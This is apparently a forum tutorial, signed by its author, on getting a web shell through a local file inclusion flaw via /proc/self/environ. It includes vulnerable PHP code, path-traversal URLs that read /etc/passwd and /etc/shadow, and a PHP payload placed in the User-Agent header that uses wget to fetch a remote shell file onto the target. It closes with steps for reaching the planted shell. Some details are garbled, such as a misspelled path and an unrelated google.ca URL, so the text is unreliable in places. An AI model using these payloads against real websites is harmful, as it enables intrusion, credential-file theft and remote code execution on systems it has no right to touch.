LFI Shell Upload Via the proc/self/environ method

Assalam-O-Alaikum,

Did you ever uploaded shell of LFI Vulnerabilities,well many of you have done it with tough way ,lets see How This Method Will be simple for you.

This Topic Is Linked With My Previous Topic Of  LFI Vulnerabilities , so if you don't know what i am talking about then reading this trick is useless first read LFI Vulnerabilites So Lets Start I Have Decided this into 4 Parts To Make It  Simple.

• Introduction 
•  /proc/self/environ
•  PHP injection 
•  Accessing the shell 

1. Introduction

Remember  LFI vuneraility am sure you are? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.

Here is the example of a code that is vulnerable to LFI:

<?php
// LFI Vulnerable Code
$redirect = $_GET[redirect];
include($redirect);
?>

It is vulnerable because

$redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.

Here is a example of LFI on Unix (very old):

http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)

2. proc/self/environ

To check if it is vulnerable, we enter this in the ../ part:

../../../../../proc/sef/environ

If you get something like

 DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... (That means it is vulnerable.)

If you get only a blank page, it isn't vulnerable.

3. PHP Injection

Now, let's access it and use Tamper Data to change the user agent to this:

<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>

Now, submit the request.

Our command will be executed.

4. Accessing the shell

To check if the command got executed, we will enter something like this:

http://www.google.ca/gonullyourself.php



If our shell is there, the command was successfully executed.  Easy nuh :p special thanks to rGod at insecurity.ro

Regards,

Zulqurnain jutt